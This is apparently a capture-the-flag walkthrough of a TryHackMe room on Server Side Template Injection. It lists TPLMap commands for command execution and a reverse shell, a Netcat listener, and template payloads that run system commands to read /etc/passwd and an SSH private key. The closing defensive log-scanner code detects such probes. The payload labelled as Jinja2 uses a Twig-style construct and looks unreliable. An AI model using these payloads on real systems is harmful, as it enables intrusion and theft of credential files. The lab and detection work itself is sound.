Introduction

In this walkthrough, we covered manual and automatic methods to detect and exploit Server Side Template Injection (SSTI), using the ZTH: Obscure Web Vulns room from TryHackMe.

SSTI or Server Side Template Injection

First off, what exactly is SSTI? I learned that it’s a vulnerability that can occur when a web application uses a template engine to generate dynamic content, but it doesn’t properly sanitize the user’s input. This means that if you can inject code into the template, the server will execute it. Think of it like this: if a website is building a page using a template and it takes your name to display a friendly “Hello, [Your Name]!”, an SSTI vulnerability would allow you to insert code instead of your name, and the server would run it.

I found that this type of vulnerability is common in applications like wikis, blogs, and content management systems. A great way to test for it is to use a simple arithmetic expression like {{2+2}}. If the website displays “4” instead of “{{2+2}}”, you’ve likely found an SSTI vulnerability (the {{ }} delimiters are what Jinja2 and Twig use; other template engines have their own expression syntax). For anyone wanting to dig deeper, I highly recommend checking out the articles on PortSwigger’s website.

Putting Theory into Practice

I found a web application to test my newfound knowledge. It had a simple input box that asked, “What is two plus two?”. When I typed “4”, it confirmed the correct answer. By looking at the page source, I could see that my input was being taken and displayed back to me. This was the perfect place to try out some SSTI payloads.

Automatic Exploitation with TPLMap

To start, I decided to use a tool called TPLMap, which is designed specifically for finding and exploiting SSTI. It’s a powerful tool that can automate the entire process.

I ran TPLMap against the vulnerable URL and pointed it to the parameter I suspected was vulnerable. The tool quickly confirmed that the application was using the Jinja2 template engine and that it was indeed vulnerable. TPLMap even showed me that I could get a shell on the server!

To test this, I used TPLMap to execute the id command on the server, and it worked perfectly, showing me the user ID. Next, I set up a Netcat listener on my own machine and used TPLMap to get a reverse shell, giving me direct command-line access to the server.

Manual Exploitation

After seeing how easy it was with a tool, I wanted to try exploiting the vulnerability manually. I went back to the web application and entered {{2+2}} into the input box. As expected, the page returned “4”.

I then tried a more advanced payload to see if I could read files from the server. I used a payload designed to execute commands and read the /etc/passwd file. It worked! The contents of the file were displayed right there on the web page. I also tried to read an SSH private key, but that attempt resulted in an error.

The Final Challenge

The video I was following concluded with a challenge: find a flag located at /flag on the server. I decided to try both my automatic and manual methods.

First, I used TPLMap with a command to read the /flag file. It immediately returned the flag: “cocktails”.

Then, for the manual approach, I used my file-reading payload and simply replaced /etc/passwd with /flag. And just like that, the flag “cocktails” was displayed on the page.

Technical Commands Used

Here are the technical commands I used on the terminal during this process:

  • python2 tplmap.py -u <URL> -d name
    • This command runs TPLMap to test a URL for SSTI, specifying the vulnerable parameter with the -d flag.
  • python2 tplmap.py -u <URL> -d name --os-cmd id
    • This command uses TPLMap to execute the id command on the target server.
  • nc -lvp 4545
    • This sets up a Netcat listener on port 4545, waiting for an incoming connection (like a reverse shell).
  • python2 tplmap.py -u <URL> -d name --os-shell
    • This command instructs TPLMap to attempt to establish a reverse shell to a specified IP and port.
  • python2 tplmap.py -u <URL> -d name --os-cmd "cat /etc/passwd"
    • This command uses TPLMap to read the /etc/passwd file from the server.
  • {{_self.0.popen('cat /etc/passwd').read()}}
    • This is a manual SSTI payload for Jinja2 that executes the cat /etc/passwd command and displays the output.
  • {{_self.0.popen('cat /home/test/.ssh/id_rsa').read()}}
    • A manual payload to attempt to read an SSH private key.
  • python2 tplmap.py -u <URL> -d name --os-cmd "cat /flag"
    • The TPLMap command used to automatically find and display the challenge flag.
  • {{_self.0.popen('cat /flag').read()}}
    • The manual payload used to find and display the challenge flag.
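A defender-side counterpart to the probes and payloads listed above, added here as an example (it is not part of the original walkthrough, the room, or TPLMap): a small Python scanner that percent-decodes web-server access-log lines and flags requests carrying template delimiters or the Jinja2 escape gadgets used in these payloads. The log lines are constructed for the example; the pattern names and severity labels are my own choices.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the room); the 2nd and 3rd requests carry the
# {{2+2}} probe and the popen() payload from this walkthrough, URL-encoded by the browser.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=4 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /?name=%7B%7B2%2B2%7D%7D HTTP/1.1" 200 513
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /?name=%7B%7B_self.0.popen('cat%20/etc/passwd').read()%7D%7D HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?name=Alice HTTP/1.1" 200 512
"""

# Expression delimiters of common engines ({{ }} Jinja2/Twig, ${ } Freemarker/
# Velocity, <% %> ERB/JSP) and the Jinja2 escape gadgets seen in the payloads above.
PROBE_PATTERNS = (
    ("template_delimiters", re.compile(r"\{\{.+?\}\}|\$\{.+?\}|<%.+?%>")),
    ("jinja2_gadget", re.compile(r"_self\b|__class__|__globals__|popen\(")),
)

# Combined log format: client IP first, request line inside the first quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) ')

def decode_target(line):
    """Return (ip, percent-decoded request target), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode before matching: %7B%7B only becomes {{ after unquote(), so a rule
    # applied to the raw line would miss every encoded probe.
    return m.group("ip"), unquote(m.group("target"))

def classify(target):
    """Names of the probe patterns that match one decoded request target."""
    return [name for name, rx in PROBE_PATTERNS if rx.search(target)]

def scan_log(text):
    """One finding per request that looks like an SSTI probe or payload."""
    findings = []
    for line in text.splitlines():
        parsed = decode_target(line)
        if parsed is None:
            continue
        ip, target = parsed
        hits = classify(target)
        if hits:
            # A gadget hit is an exploitation attempt, not just a {{2+2}} probe.
            severity = "high" if "jinja2_gadget" in hits else "medium"
            findings.append({"ip": ip, "target": target, "hits": hits, "severity": severity})
    return findings
```

Bare {{ }} can occur in legitimate input, so the delimiter rule is only a medium-severity probe signal; the gadget rule is the one worth paging on.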

Room Answers

What is the flag?

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
